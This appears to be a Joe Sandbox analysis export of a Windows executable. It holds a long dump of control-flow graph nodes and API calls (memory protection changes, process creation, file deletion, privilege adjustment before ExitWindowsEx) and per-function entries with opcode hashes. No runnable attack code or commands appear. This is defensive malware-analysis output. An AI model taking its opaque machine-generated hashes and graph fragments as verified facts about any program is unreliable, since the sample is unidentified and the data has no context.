6316->6318 6319 404323 6318->6319 6320 402c08 6323 402c82 6320->6323 6324 402c19 6320->6324 6321 402c56 RtlUnwind 6322 403154 4 API calls 6321->6322 6322->6323 6324->6321 6324->6323 6327 402b28 6324->6327 6328 402b31 RaiseException 6327->6328 6329 402b47 6327->6329 6328->6329 6329->6321 6330 408c10 6331 408c17 6330->6331 6332 403198 4 API calls 6331->6332 6340 408cb1 6332->6340 6333 408cdc 6334 4031b8 4 API calls 6333->6334 6336 408d69 6334->6336 6335 408cc8 6338 4032fc 4 API calls 6335->6338 6337 403278 4 API calls 6337->6340 6338->6333 6339 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6339->6340 6340->6333 6340->6335 6340->6337 6340->6339 6341 40a011 6342 40a036 6341->6342 6343 407918 InterlockedExchange 6342->6343 6345 40a060 6343->6345 6344 40a070 6351 4076ac SetEndOfFile 6344->6351 6345->6344 6346 409aa0 4 API calls 6345->6346 6346->6344 6348 40a08c 6349 4025ac 4 API calls 6348->6349 6350 40a0c3 6349->6350 6352 4076c3 6351->6352 6353 4076bc 6351->6353 6352->6348 6354 40748c 21 API calls 6353->6354 6354->6352 6766 409916 6767 409918 6766->6767 6768 40993a 6767->6768 6769 409956 CallWindowProcA 6767->6769 6769->6768 6082 407017 6083 407008 SetErrorMode 6082->6083 6359 403018 6360 403070 6359->6360 6361 403025 6359->6361 6362 40302a RtlUnwind 6361->6362 6363 40304e 6362->6363 6365 402f78 6363->6365 6366 402be8 6363->6366 6367 402bf1 RaiseException 6366->6367 6368 402c04 6366->6368 6367->6368 6368->6360 6776 409918 6777 409927 6776->6777 6778 40993a 6776->6778 6777->6778 6779 409956 CallWindowProcA 6777->6779 6779->6778 6373 40901e 6374 409010 6373->6374 6375 408fac Wow64RevertWow64FsRedirection 6374->6375 6376 409018 6375->6376 6377 409020 SetLastError 6378 409029 6377->6378 6389 403a28 ReadFile 6390 403a46 6389->6390 6391 403a49 GetLastError 6389->6391 6220 40762c ReadFile 6221 407663 6220->6221 6222 40764c 6220->6222 6223 407652 GetLastError 6222->6223 6224 40765c 6222->6224 6223->6221 6223->6224 6225 40748c 21 API calls 6224->6225 6225->6221 6396 40a02c 6397 409aa0 4 API calls 6396->6397 6398 40a031 6397->6398 6399 40a036 6398->6399 6400 402f24 5 API calls 6398->6400 6401 407918 InterlockedExchange 6399->6401 6400->6399 6402 40a060 6401->6402 6403 40a070 6402->6403 6404 409aa0 4 API calls 6402->6404 6405 4076ac 22 API calls 6403->6405 6404->6403 6406 40a08c 6405->6406 6407 4025ac 4 API calls 6406->6407 6408 40a0c3 6407->6408 6780 40712e 6781 407118 6780->6781 6782 403198 4 API calls 6781->6782 6783 407120 6782->6783 6784 403198 4 API calls 6783->6784 6785 407128 6784->6785 6786 408f30 6789 408dfc 6786->6789 6790 408e05 6789->6790 6791 403198 4 API calls 6790->6791 6792 408e13 6790->6792 6791->6790 6793 403932 6794 403924 6793->6794 6797 40374c 6794->6797 6796 40392c 6798 403759 6797->6798 6799 403766 6797->6799 6798->6799 6800 403779 VariantClear 6798->6800 6799->6796 6800->6796 6031 4075c4 SetFilePointer 6032 4075f7 6031->6032 6033 4075e7 GetLastError 6031->6033 6033->6032 6034 4075f0 6033->6034 6035 40748c 21 API calls 6034->6035 6035->6032 6409 405ac4 6410 405acc 6409->6410 6412 405ad4 6409->6412 6411 405adb 6410->6411 6413 405ad2 6410->6413 6414 405930 5 API calls 6411->6414 6416 405a3c 6413->6416 6414->6412 6417 405a44 6416->6417 6418 405a5e 6417->6418 6421 403154 4 API calls 6417->6421 6419 405a63 6418->6419 6420 405a7a 6418->6420 6422 405930 5 API calls 6419->6422 6423 403154 4 API calls 6420->6423 6421->6417 6424 405a76 6422->6424 6425 405a7f 6423->6425 6427 403154 4 API calls 6424->6427 6426 4059a0 19 API calls 6425->6426 6426->6424 6428 405aa8 6427->6428 6429 403154 4 API calls 6428->6429 6430 405ab6 6429->6430 6430->6412 6431 4076c8 WriteFile 6432 4076e8 6431->6432 6433 4076ef 6431->6433 6434 40748c 21 API calls 6432->6434 6435 407700 6433->6435 6436 4073ec 20 API calls 6433->6436 6434->6433 6436->6435 6437 40a2ca 6446 4096fc 6437->6446 6440 402f24 5 API calls 6441 40a2d4 6440->6441 6442 403198 4 API calls 6441->6442 6443 40a2f3 6442->6443 6444 403198 4 API calls 6443->6444 6445 40a2fb 6444->6445 6455 40569c 6446->6455 6448 409717 6449 409745 6448->6449 6461 40720c 6448->6461 6452 403198 4 API calls 6449->6452 6451 409735 6454 40973d MessageBoxA 6451->6454 6453 40975a 6452->6453 6453->6440 6454->6449 6456 403154 4 API calls 6455->6456 6457 4056a1 6456->6457 6458 4056b9 6457->6458 6459 403154 4 API calls 6457->6459 6458->6448 6460 4056af 6459->6460 6460->6448 6462 40569c 4 API calls 6461->6462 6463 40721b 6462->6463 6464 407221 6463->6464 6465 40722f 6463->6465 6466 40322c 4 API calls 6464->6466 6467 40724b 6465->6467 6468 40723f 6465->6468 6470 40722d 6466->6470 6479 4032b8 6467->6479 6472 4071d0 6468->6472 6470->6451 6473 40322c 4 API calls 6472->6473 6474 4071df 6473->6474 6475 4071fc 6474->6475 6476 406950 CharPrevA 6474->6476 6475->6470 6477 4071eb 6476->6477 6477->6475 6478 4032fc 4 API calls 6477->6478 6478->6475 6480 403278 4 API calls 6479->6480 6481 4032c2 6480->6481 6481->6470 6482 402ccc 6483 402cdd 6482->6483 6487 402cfe 6482->6487 6484 402d88 RtlUnwind 6483->6484 6486 402b28 RaiseException 6483->6486 6483->6487 6485 403154 4 API calls 6484->6485 6485->6487 6488 402d7f 6486->6488 6488->6484 6809 403fcd 6810 403f07 4 API calls 6809->6810 6811 403fd6 6810->6811 6812 403e9c 4 API calls 6811->6812 6813 403fe2 6812->6813 5467 4024d0 5468 4024e4 5467->5468 5469 4024f7 5467->5469 5506 401918 RtlInitializeCriticalSection 5468->5506 5471 402518 5469->5471 5472 40250e RtlEnterCriticalSection 5469->5472 5483 402300 5471->5483 5472->5471 5475 4024ed 5477 402525 5480 402581 5477->5480 5481 402577 RtlLeaveCriticalSection 5477->5481 5479 402531 5479->5477 5513 40215c 5479->5513 5481->5480 5484 402314 5483->5484 5485 4023b8 5484->5485 5486 402335 5484->5486 5487 402344 5485->5487 5491 402455 5485->5491 5530 401d80 5485->5530 5538 401e84 5485->5538 5486->5487 5527 401b74 5486->5527 5487->5477 5493 401fd4 5487->5493 5491->5487 5534 401d00 5491->5534 5494 401fe8 5493->5494 5495 401ffb 5493->5495 5496 401918 4 API calls 5494->5496 5497 402012 RtlEnterCriticalSection 5495->5497 5500 40201c 5495->5500 5498 401fed 5496->5498 5497->5500 5498->5495 5499 401ff1 5498->5499 5503 402052 5499->5503 5500->5503 5620 401ee0 5500->5620 5503->5479 5504 402147 5504->5479 5505 40213d RtlLeaveCriticalSection 5505->5504 5507 40193c RtlEnterCriticalSection 5506->5507 5508 401946 5506->5508 5507->5508 5509 401964 LocalAlloc 5508->5509 5510 40197e 5509->5510 5511 4019c3 RtlLeaveCriticalSection 5510->5511 5512 4019cd 5510->5512 5511->5512 5512->5469 5512->5475 5514 40217a 5513->5514 5515 402175 5513->5515 5516 4021ab RtlEnterCriticalSection 5514->5516 5519 4021b5 5514->5519 5523 40217e 5514->5523 5517 401918 4 API calls 5515->5517 5516->5519 5517->5514 5518 4021c1 5521 4022e3 RtlLeaveCriticalSection 5518->5521 5522 4022ed 5518->5522 5519->5518 5520 402244 5519->5520 5525 402270 5519->5525 5520->5523 5524 401d80 7 API calls 5520->5524 5521->5522 5522->5477 5523->5477 5524->5523 5525->5518 5526 401d00 7 API calls 5525->5526 5526->5518 5528 40215c 9 API calls 5527->5528 5529 401b95 5528->5529 5529->5487 5531 401d89 5530->5531 5533 401d92 5530->5533 5532 401b74 9 API calls 5531->5532 5531->5533 5532->5533 5533->5485 5535 401d1e 5534->5535 5536 401d4e 5534->5536 5535->5487 5536->5535 5543 401c68 5536->5543 5598 401768 5538->5598 5540 401e99 5542 401ea6 5540->5542 5609 401dcc 5540->5609 5542->5485 5544 401c7a 5543->5544 5545 401c9d 5544->5545 5546 401caf 5544->5546 5556 40188c 5545->5556 5547 40188c 3 API calls 5546->5547 5549 401cad 5547->5549 5550 401cc5 5549->5550 5566 401b44 5549->5566 5550->5535 5552 401cd4 5553 401cee 5552->5553 5571 401b98 5552->5571 5576 4013a0 5553->5576 5557 4018b2 5556->5557 5565 40190b 5556->5565 5580 401658 5557->5580 5562 4018e6 5564 4013a0 LocalAlloc 5562->5564 5562->5565 5564->5565 5565->5549 5567 401b61 5566->5567 5568 401b52 5566->5568 5567->5552 5569 401d00 9 API calls 5568->5569 5570 401b5f 5569->5570 5570->5552 5572 401bab 5571->5572 5573 401b9d 5571->5573 5572->5553 5574 401b74 9 API calls 5573->5574 5575 401baa 5574->5575 5575->5553 5577 4013ab 5576->5577 5578 4013c6 5577->5578 5579 4012e4 LocalAlloc 5577->5579 5578->5550 5579->5578 5582 40168f 5580->5582 5581 4016cf 5584 40132c 5581->5584 5582->5581 5583 4016a9 VirtualFree 5582->5583 5583->5582 5585 401348 5584->5585 5592 4012e4 5585->5592 5588 40150c 5590 40153b 5588->5590 5589 401594 5589->5562 5590->5589 5591 401568 VirtualFree 5590->5591 5591->5590 5595 40128c 5592->5595 5596 401298 LocalAlloc 5595->5596 5597 4012aa 5595->5597 5596->5597 5597->5562 5597->5588 5600 401787 5598->5600 5599 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5599->5600 5600->5599 5601 40183b 5600->5601 5603 40132c LocalAlloc 5600->5603 5604 401821 5600->5604 5605 4017d6 5600->5605 5606 4017e7 5601->5606 5616 4015c4 5601->5616 5603->5600 5607 40150c VirtualFree 5604->5607 5608 40150c VirtualFree 5605->5608 5606->5540 5607->5606 5608->5606 5610 401d80 9 API calls 5609->5610 5611 401de0 5610->5611 5612 40132c LocalAlloc 5611->5612 5613 401df0 5612->5613 5614 401b44 9 API calls 5613->5614 5615 401df8 5613->5615 5614->5615 5615->5542 5617 40160a 5616->5617 5618 401626 VirtualAlloc 5617->5618 5619 40163a 5617->5619 5618->5617 5618->5619 5619->5606 5624 401ef0 5620->5624 5621 401f1c 5622 401d00 9 API calls 5621->5622 5625 401f40 5621->5625 5622->5625 5624->5621 5624->5625 5626 401e58 5624->5626 5625->5504 5625->5505 5631 4016d8 5626->5631 5629 401e75 5629->5624 5630 401dcc 9 API calls 5630->5629 5634 4016f4 5631->5634 5633 4016fe 5635 4015c4 VirtualAlloc 5633->5635 5634->5633 5636 40175b 5634->5636 5637 40132c LocalAlloc 5634->5637 5639 40174f 5634->5639 5641 401430 5634->5641 5638 40170a 5635->5638 5636->5629 5636->5630 5637->5634 5638->5636 5640 40150c VirtualFree 5639->5640 5640->5636 5642 40143f VirtualAlloc 5641->5642 5644 40146c 5642->5644 5645 40148f 5642->5645 5646 4012e4 LocalAlloc 5644->5646 5645->5634 5647 401478 5646->5647 5647->5645 5648 40147c VirtualFree 5647->5648 5648->5645 6489 4028d2 6490 4028da 6489->6490 6491 403554 4 API calls 6490->6491 6492 4028ef 6490->6492 6491->6490 6493 4025ac 4 API calls 6492->6493 6494 4028f4 6493->6494 6814 4019d3 6815 4019ba 6814->6815 6816 4019c3 RtlLeaveCriticalSection 6815->6816 6817 4019cd 6815->6817 6816->6817 6036 407fd4 6037 407fe6 6036->6037 6039 407fed 6036->6039 6047 407f10 6037->6047 6040 408021 6039->6040 6042 408015 6039->6042 6043 408017 6039->6043 6041 40804e 6040->6041 6045 407d7c 19 API calls 6040->6045 6061 407e2c 6042->6061 6058 407d7c 6043->6058 6045->6041 6048 407f25 6047->6048 6049 407d7c 19 API calls 6048->6049 6050 407f34 6048->6050 6049->6050 6051 407f6e 6050->6051 6052 407d7c 19 API calls 6050->6052 6053 407f82 6051->6053 6054 407d7c 19 API calls 6051->6054 6052->6051 6057 407fae 6053->6057 6068 407eb8 6053->6068 6054->6053 6057->6039 6071 4058b4 6058->6071 6060 407d9e 6060->6040 6062 405184 19 API calls 6061->6062 6063 407e57 6062->6063 6079 407de4 6063->6079 6065 407e5f 6066 403198 4 API calls 6065->6066 6067 407e74 6066->6067 6067->6040 6069 407ec7 VirtualFree 6068->6069 6070 407ed9 VirtualAlloc 6068->6070 6069->6070 6070->6057 6072 4058c0 6071->6072 6073 405184 19 API calls 6072->6073 6074 4058ed 6073->6074 6075 4031e8 4 API calls 6074->6075 6076 4058f8 6075->6076 6077 403198 4 API calls 6076->6077 6078 40590d 6077->6078 6078->6060 6080 4058b4 19 API calls 6079->6080 6081 407e06 6080->6081 6081->6065 6499 40a0d5 6500 40a105 6499->6500 6501 40a10f CreateWindowExA SetWindowLongA 6500->6501 6502 405184 19 API calls 6501->6502 6503 40a192 6502->6503 6504 4032fc 4 API calls 6503->6504 6505 40a1a0 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1ad 6506->6507 6508 406b7c 5 API calls 6507->6508 6509 40a1b9 6508->6509 6510 4032fc 4 API calls 6509->6510 6511 40a1c2 6510->6511 6512 4099a4 29 API calls 6511->6512 6513 40a1d4 6512->6513 6514 409884 5 API calls 6513->6514 6515 40a1e7 6513->6515 6514->6515 6516 40a220 6515->6516 6517 4094d8 9 API calls 6515->6517 6518 40a239 6516->6518 6521 40a233 RemoveDirectoryA 6516->6521 6517->6516 6519 40a242 74075DF0 6518->6519 6520 40a24d 6518->6520 6519->6520 6522 40a275 6520->6522 6523 40357c 4 API calls 6520->6523 6521->6518 6524 40a26b 6523->6524 6525 4025ac 4 API calls 6524->6525 6525->6522 6084 40a0e7 6085 40a0eb SetLastError 6084->6085 6116 409648 GetLastError 6085->6116 6088 40a105 6090 40a10f CreateWindowExA SetWindowLongA 6088->6090 6089 402f24 5 API calls 6089->6088 6091 405184 19 API calls 6090->6091 6092 40a192 6091->6092 6093 4032fc 4 API calls 6092->6093 6094 40a1a0 6093->6094 6095 4032fc 4 API calls 6094->6095 6096 40a1ad 6095->6096 6129 406b7c GetCommandLineA 6096->6129 6099 4032fc 4 API calls 6100 40a1c2 6099->6100 6134 4099a4 6100->6134 6103 409884 5 API calls 6104 40a1e7 6103->6104 6105 40a220 6104->6105 6106 40a207 6104->6106 6108 40a239 6105->6108 6111 40a233 RemoveDirectoryA 6105->6111 6150 4094d8 6106->6150 6109 40a242 74075DF0 6108->6109 6110 40a24d 6108->6110 6109->6110 6112 40a275 6110->6112 6158 40357c 6110->6158 6111->6108 6114 40a26b 6115 4025ac 4 API calls 6114->6115 6115->6112 6117 404c84 19 API calls 6116->6117 6118 40968f 6117->6118 6119 407284 5 API calls 6118->6119 6120 40969f 6119->6120 6121 408da8 4 API calls 6120->6121 6122 4096b4 6121->6122 6123 405880 4 API calls 6122->6123 6124 4096c3 6123->6124 6125 4031b8 4 API calls 6124->6125 6126 4096e2 6125->6126 6127 403198 4 API calls 6126->6127 6128 4096ea 6127->6128 6128->6088 6128->6089 6130 406af0 4 API calls 6129->6130 6131 406ba1 6130->6131 6132 403198 4 API calls 6131->6132 6133 406bbf 6132->6133 6133->6099 6135 4033b4 4 API calls 6134->6135 6136 4099df 6135->6136 6137 409a11 CreateProcessA 6136->6137 6138 409a24 CloseHandle 6137->6138 6139 409a1d 6137->6139 6141 409a2d 6138->6141 6140 409648 21 API calls 6139->6140 6140->6138 6171 409978 6141->6171 6144 409a49 6145 409978 3 API calls 6144->6145 6146 409a4e GetExitCodeProcess CloseHandle 6145->6146 6147 409a6e 6146->6147 6148 403198 4 API calls 6147->6148 6149 409a76 6148->6149 6149->6103 6149->6104 6151 409532 6150->6151 6152 4094eb 6150->6152 6151->6105 6152->6151 6153 4094f3 Sleep 6152->6153 6154 409503 Sleep 6152->6154 6156 40951a GetLastError 6152->6156 6175 408fbc 6152->6175 6153->6152 6154->6152 6156->6151 6157 409524 GetLastError 6156->6157 6157->6151 6157->6152 6159 403591 6158->6159 6167 4035a0 6158->6167 6163 4035d0 6159->6163 6164 40359b 6159->6164 6166 4035b6 6159->6166 6160 4035b1 6165 403198 4 API calls 6160->6165 6161 4035b8 6162 4031b8 4 API calls 6161->6162 6162->6166 6163->6166 6169 40357c 4 API calls 6163->6169 6164->6167 6168 4035ec 6164->6168 6165->6166 6166->6114 6167->6160 6167->6161 6168->6166 6183 403554 6168->6183 6169->6163 6172 40998c PeekMessageA 6171->6172 6173 409980 TranslateMessage DispatchMessageA 6172->6173 6174 40999e MsgWaitForMultipleObjects 6172->6174 6173->6172 6174->6141 6174->6144 6176 408f70 2 API calls 6175->6176 6178 408fd2 6176->6178 6177 408fd6 6177->6152 6178->6177 6179 408ff2 DeleteFileA GetLastError 6178->6179 6180 409010 6179->6180 6181 408fac Wow64RevertWow64FsRedirection 6180->6181 6182 409018 6181->6182 6182->6152 6184 403566 6183->6184 6186 403578 6184->6186 6187 403604 6184->6187 6186->6168 6188 40357c 6187->6188 6189 4035a0 6188->6189 6193 4035d0 6188->6193 6194 40359b 6188->6194 6196 4035b6 6188->6196 6190 4035b1 6189->6190 6191 4035b8 6189->6191 6195 403198 4 API calls 6190->6195 6192 4031b8 4 API calls 6191->6192 6192->6196 6193->6196 6198 40357c 4 API calls 6193->6198 6194->6189 6197 4035ec 6194->6197 6195->6196 6196->6184 6197->6196 6199 403554 4 API calls 6197->6199 6198->6193 6199->6197 6821 402be9 RaiseException 6822 402c04 6821->6822 6532 402af2 6533 402afe 6532->6533 6536 402ed0 6533->6536 6537 403154 4 API calls 6536->6537 6539 402ee0 6537->6539 6538 402b03 6539->6538 6541 402b0c 6539->6541 6542 402b25 6541->6542 6543 402b15 RaiseException 6541->6543 6542->6538 6543->6542 6823 402dfa 6824 402e26 6823->6824 6825 402e0d 6823->6825 6827 402ba4 6825->6827 6828 402bc9 6827->6828 6829 402bad 6827->6829 6828->6824 6830 402bb5 RaiseException 6829->6830 6830->6828 6831 4075fa GetFileSize 6832 407626 6831->6832 6833 407616 GetLastError 6831->6833 6833->6832 6834 40761f 6833->6834 6835 40748c 21 API calls 6834->6835 6835->6832 6836 406ffb 6837 407008 SetErrorMode 6836->6837 6548 403a80 CloseHandle 6549 403a90 6548->6549 6550 403a91 GetLastError 6548->6550 6551 40a282 6553 40a1f4 6551->6553 6552 40a220 6555 40a239 6552->6555 6558 40a233 RemoveDirectoryA 6552->6558 6553->6552 6554 4094d8 9 API calls 6553->6554 6554->6552 6556 40a242 74075DF0 6555->6556 6557 40a24d 6555->6557 6556->6557 6559 40a275 6557->6559 6560 40357c 4 API calls 6557->6560 6558->6555 6561 40a26b 6560->6561 6562 4025ac 4 API calls 6561->6562 6562->6559 6563 404283 6564 4042c3 6563->6564 6565 403154 4 API calls 6564->6565 6566 404323 6565->6566 6838 404185 6839 4041ff 6838->6839 6840 4041cc 6839->6840 6841 403154 4 API calls 6839->6841 6842 404323 6841->6842 6567 40a287 6568 40a290 6567->6568 6570 40a2bb 6567->6570 6577 409448 6568->6577 6572 403198 4 API calls 6570->6572 6571 40a295 6571->6570 6574 40a2b3 MessageBoxA 6571->6574 6573 40a2f3 6572->6573 6575 403198 4 API calls 6573->6575 6574->6570 6576 40a2fb 6575->6576 6578 409454 GetCurrentProcess OpenProcessToken 6577->6578 6579 4094af ExitWindowsEx 6577->6579 6580 409466 6578->6580 6581 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6578->6581 6579->6580 6580->6571 6581->6579 6581->6580 6582 403e87 6583 403e4c 6582->6583 6584 403e67 6583->6584 6585 403e62 6583->6585 6586 403e7b 6583->6586 6589 403e78 6584->6589 6595 402674 6584->6595 6591 403cc8 6585->6591 6588 402674 4 API calls 6586->6588 6588->6589 6592 403cd6 6591->6592 6593 402674 4 API calls 6592->6593 6594 403ceb 6592->6594 6593->6594 6594->6584 6596 403154 4 API calls 6595->6596 6597 40267a 6596->6597 6597->6589 6602 407e90 6603 407eb8 VirtualFree 6602->6603 6604 407e9d 6603->6604 6851 403991 6852 403983 6851->6852 6853 40374c VariantClear 6852->6853 6854 40398b 6853->6854 6855 405b92 6857 405b94 6855->6857 6856 405bd0 6860 405930 5 API calls 6856->6860 6857->6856 6858 405be7 6857->6858 6859 405bca 6857->6859 6864 404ccc 5 API calls 6858->6864 6859->6856 6861 405c3c 6859->6861 6862 405be3 6860->6862 6863 4059a0 19 API calls 6861->6863 6865 403198 4 API calls 6862->6865 6863->6862 6866 405c10 6864->6866 6867 405c76 6865->6867 6868 4059a0 19 API calls 6866->6868 6868->6862 6607 403e95 6608 403e4c 6607->6608 6609 403e62 6608->6609 6610 403e7b 6608->6610 6612 403e67 6608->6612 6611 403cc8 4 API calls 6609->6611 6613 402674 4 API calls 6610->6613 6611->6612 6614 403e78 6612->6614 6615 402674 4 API calls 6612->6615 6613->6614 6615->6614 6616 403a97 6617 403aac 6616->6617 6618 403bbc GetStdHandle 6617->6618 6619 403b0e CreateFileA 6617->6619 6629 403ab2 6617->6629 6620 403c17 GetLastError 6618->6620 6624 403bba 6618->6624 6619->6620 6621 403b2c 6619->6621 6620->6629 6623 403b3b GetFileSize 6621->6623 6621->6624 6623->6620 6625 403b4e SetFilePointer 6623->6625 6626 403be7 GetFileType 6624->6626 6624->6629 6625->6620 6630 403b6a ReadFile 6625->6630 6628 403c02 CloseHandle 6626->6628 6626->6629 6628->6629 6630->6620 6631 403b8c 6630->6631 6631->6624 6632 403b9f SetFilePointer 6631->6632 6632->6620 6633 403bb0 SetEndOfFile 6632->6633 6633->6620 6633->6624 6887 4011aa 6888 4011ac GetStdHandle 6887->6888 6226 4076ac SetEndOfFile 6227 4076c3 6226->6227 6228 4076bc 6226->6228 6229 40748c 21 API calls 6228->6229 6229->6227 6637 4028ac 6638 402594 4 API calls 6637->6638 6639 4028b6 6638->6639 6640 401ab9 6641 401a96 6640->6641 6642 401aa9 RtlDeleteCriticalSection 6641->6642 6643 401a9f RtlLeaveCriticalSection 6641->6643 6643->6642

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00409B30 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                                                                                                      • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2441996862-0
                                                                                                                                                                      • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                                      • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                                      • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004051FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                      • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                                      • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                                                                                                      • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                                      • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                                                                                      • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.3833767032.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000010.00000002.3833615609.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3833960433.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000010.00000002.3834103434.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                      • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                      • API String ID: 3256987805-3653653586
                                                                                                                                                                      • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                      • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                                                                                      • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                                      • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A0E7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,01FF0838), ref: 0040966C
